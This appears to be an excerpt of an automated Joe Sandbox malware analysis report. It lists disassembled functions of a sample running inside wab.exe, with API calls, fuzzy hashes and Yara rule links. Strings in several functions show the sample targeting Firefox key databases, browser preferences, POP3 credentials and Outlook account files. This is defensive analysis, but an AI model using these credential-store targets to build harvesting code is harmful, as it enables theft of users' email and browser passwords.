                                                                                                                                                                                                          Function 00405972 Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$DialogMessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2485852401-0
                                                                                                                                                                                                          • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                          • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B0EB Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3642520215-0
                                                                                                                                                                                                          • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                          • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405BBD Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                          • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                          • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040690E Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 85stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                          • String ID: C@$key3.db$key4.db
                                                                                                                                                                                                          • API String ID: 581844971-2841947474
                                                                                                                                                                                                          • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                          • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B86F Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2126104762-0
                                                                                                                                                                                                          • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                          • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407065 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1999381814-0
                                                                                                                                                                                                          • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                          • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004258DC Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 438COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                                                                                                          • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                          • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D7EA Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                          • String ID: user_pref("
                                                                                                                                                                                                          • API String ID: 765841271-2487180061
                                                                                                                                                                                                          • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                          • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004057FC Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                                          • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                          • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                          • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A596 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                          • API String ID: 1631269929-4153097237
                                                                                                                                                                                                          • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                          • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408B27 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                            • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • strings, xrefs: 00408B98
                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                          • API String ID: 4036804644-4125592482
                                                                                                                                                                                                          • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                          • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407E63 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,75C8E430,?), ref: 00407F2F
                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                                                                                                          • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                          • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409123 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                                                                                                          • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                          • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407446 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                                                                                                                          • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                          • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443683 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                                          • API String ID: 1886237854-2881260426
                                                                                                                                                                                                          • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                          • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408F5D
